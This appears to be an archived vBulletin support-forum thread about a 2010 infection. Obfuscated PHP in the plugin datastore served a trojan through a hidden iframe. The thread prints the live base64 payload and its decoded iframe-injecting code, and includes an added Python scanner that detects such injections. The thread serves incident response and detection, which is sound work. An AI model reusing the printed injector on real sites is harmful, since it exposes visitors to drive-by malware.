vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)
-   -   new 0 day exploit? (bekebu.in / cuzelu.in) (https://vborg.vbsupport.ru/showthread.php?t=245207)

SomeDude-GP 06-24-2010 03:02 PM

new 0 day exploit? (bekebu.in / cuzelu.in)
 
I have noticed in the last few days my VB install has been trying to infect users with a trojan coming from bekebu.in and/or cuzelu.in

http://support.clean-mx.de/clean-mx/...n&submit=query

Not sure if this was a new 0 day going around or not, but it may be worth someone's time to look into this.

:eek:

--------------- Added 06-24-2010 04:04 PM ---------------

I have blocked out the /16 that those domains are coming from and google safebrowsing doesn't come up with the malware warning anymore.

91.188.0.0/16

http://www.db.ripe.net/whois?form_ty...&submit=Search

http://www.bfk.de/bfk_dnslogger.html?query=91.188.59.55

http://www.senderbase.org/senderbase...g=91.188.59.55

ChopSuey 06-24-2010 07:39 PM

What file is calling that site?

SomeDude-GP 06-26-2010 02:27 PM

I finally found the offending code. It is in the datastore/pluginlist table. It's a base64 encoded string.

Code:

\r\n@eval(base64_decode(\"aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID0gYXJyYXkoJ01TSUUnLCdNeUlFJywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ01lZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMTEpOw0KJGRvbWIgPSAiaHR0cDovL3d3dy5mZWFsYXRvYy5jby5jYy9jbG8ucGhwIjsNCmZvcmVhY2ggKCR4YiBhcyAkeGJiKSB7DQppZihzdHJzdHIoc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLHN0cnRvbG93ZXIoJHhiYikpKSB7DQplY2hvIDw8PEhKSg0KPHNjcmlwdD4NCmZ1bmN0aW9uIFNldENvb2tpZShjb29raWVOYW1lLGNvb2tpZUNvbnRlbnQpew0KIHZhciBjb29raWVQYXRoID0gJy8nOw0KIHZhciBleHBEYXRlPW5ldyBEYXRlKCk7DQogZXhwRGF0ZS5zZXRUaW1lKGV4cERhdGUuZ2V0VGltZSgpKzM3MjgwMDAwMCkgIDsNCiB2YXIgZXhwaXJlcz1leHBEYXRlLnRvR01UU3RyaW5nKCk7DQogZG9jdW1lbnQuY29va2llPWNvb2tpZU5hbWUrIj0iK2VzY2FwZShjb29raWVDb250ZW50KSsiO3BhdGg9Iitlc2NhcGUoY29va2llUGF0aCkrIjtleHBpcmVzPSIrZXhwaXJlczsgDQp9DQpTZXRDb29raWUoInhsb3YiLCAiZGF5Iik7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFuZCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb2xsaW5nPSJubyIgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L2lmcmFtZT4NCkhKSjsNCmJyZWFrOw0KIH0NCiB9DQp9\"));
which resulted in

Code:

if (!isset($_COOKIE['xlov'])) {
    $xb = array('MSIE','MyIE','IE','Firefox','Opera','Netscape','Chrome','Safari','Media Center');
    $ifrand = mt_rand(0,111);
    $domb = "http: // www. fealatoc.co .cc/clo.php";
    foreach ($xb as $xbb) {
        if(strstr(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower($xbb))) {
            echo <<<HJJ
<script>
function SetCookie(cookieName,cookieContent){
 var cookiePath = '/';
 var expDate=new Date();
 expDate.setTime(expDate.getTime()+372800000);
 var expires=expDate.toGMTString();
 document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;
}
SetCookie("xlov", "day");
</script>
<iframe name="$ifrand" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="$domb"></iframe>
HJJ;
            break;
        }
    }
}

--------------- Added 06-26-2010 03:28 PM ---------------

The URL in the script code is broken on purpose.

--------------- Added 06-26-2010 03:29 PM ---------------

Thanks to the people over at Tapatalk for helping me figure this out. :wink:
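The finding above (an @eval(base64_decode(...)) string hiding an iframe injector inside stored plugin code) is easy to miss when reading a database dump by eye. The following is an added detection script, not code from the thread or from vBulletin: it scans a set of rows for eval(base64_decode()) calls, decodes the payload (following nested wrappers, which goes a step beyond the single layer seen here), and reports which rows contain markers such as iframes, script tags, cookie handling or external URLs. It assumes you feed it the phpcode column of the plugin table and/or the pluginlist datastore row; the sample rows and the malware.invalid domain are constructed for the example.

```python
import base64
import re

# Matches eval(base64_decode("...")) as found in the pluginlist entry,
# tolerating the backslash-escaped quotes a DB dump may show.
EVAL_B64 = re.compile(
    r"@?eval\s*\(\s*base64_decode\s*\(\s*\\?['\"]([A-Za-z0-9+/=]+)\\?['\"]\s*\)\s*\)",
    re.IGNORECASE,
)
# Strings that, inside decoded plugin code, warrant a manual look.
INDICATORS = ("<iframe", "<script", "document.cookie", "HTTP_USER_AGENT", "http://", "https://")

def decode_layers(b64, max_layers=3):
    """Decode a base64 string, following nested eval(base64_decode()) wrappers."""
    layers, current = [], b64
    for _ in range(max_layers):
        try:
            decoded = base64.b64decode(current, validate=True).decode("utf-8", "replace")
        except ValueError:  # not valid base64: stop here
            break
        layers.append(decoded)
        inner = EVAL_B64.search(decoded)
        if inner is None:
            break
        current = inner.group(1)
    return layers

def scan_rows(rows):
    """rows: {row_id: php_code}. Returns {row_id: {"layers": [...], "indicators": [...]}}
    for every row that contains an eval(base64_decode()) call."""
    report = {}
    for row_id, code in rows.items():
        for match in EVAL_B64.finditer(code):
            layers = decode_layers(match.group(1))
            text = "\n".join(layers).lower()
            found = [i for i in INDICATORS if i.lower() in text]
            report[row_id] = {"layers": layers, "indicators": found}
    return report

# Constructed sample rows (not the real payload): one ordinary plugin and one
# carrying an obfuscated iframe injector shaped like the code in the thread.
_PAYLOAD = (
    "if (!isset($_COOKIE['xlov'])) {\n"
    "  echo '<iframe width=\"1\" height=\"1\" src=\"http://malware.invalid/clo.php\"></iframe>';\n"
    "}"
)
SAMPLE_ROWS = {
    "clean_plugin": "$show['foo'] = true; // ordinary plugin code",
    "injected_plugin": '\r\n@eval(base64_decode("'
    + base64.b64encode(_PAYLOAD.encode()).decode() + '"));',
}

if __name__ == "__main__":
    for row_id, info in scan_rows(SAMPLE_ROWS).items():
        print(row_id, "->", info["indicators"])
        print(info["layers"][-1])
```

A hit only means the row deserves manual review; legitimate plugins rarely ship as eval'd base64, but the decoded text is what tells you whether it is an infection.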

TNCclubman 06-26-2010 02:46 PM

You're running Tapatalk on your vB? Or is it just a clean install of vB?

SomeDude-GP 06-27-2010 11:00 AM

We have been using Tapatalk for a while now. Last week a few members started getting virii warnings about bekebu.in and/or cuzelu.in. A few days ago, one of the admins at Tapatalk contacted us to let us know they had shut us down on their side due to the virii issue, and they have helped us locate some of this code.

--------------- Added 06-27-2010 12:04 PM ---------------

fealatoc . co . cc info:

http://www.db.ripe.net/whois?form_ty...&submit=Search

http://www.bfk.de/bfk_dnslogger.html?query=91.216.122.7

SomeDude-GP 06-27-2010 11:48 AM

Post Thanks 'Hack' got hacked.

SomeDude-GP 06-27-2010 11:49 AM

Also Reported to PT author @ https://vborg.vbsupport.ru/showpost....&postcount=948

BirdOPrey5 06-27-2010 11:52 AM

I guess the question is- did having tapatalk installed contribute to how you got hacked, or were they just helpful in finding it? As I have tapatalk installed I'm curious too.

SomeDude-GP 06-27-2010 12:17 PM

Tapatalk admins were very helpful with this situation. IMHO, I don't think it has anything to do with the tapatalk plugin. I think it's the post thanks `hack` that is vulnerable, but this will need to be tested and confirmed.

yellowpeter 06-27-2010 12:19 PM

I am not sure either; the information is mixed, as some forums that didn't install Tapatalk also got hacked. But one forum found a mysterious PHP file added to the Tapatalk directory, which caught our attention. So we went ahead and checked our packaging to make sure the directory is not writable by default (which was an oversight and only happened in one version release).

We have sent out an email to all forum owners to upgrade, so I hope to keep this infection to a minimum.
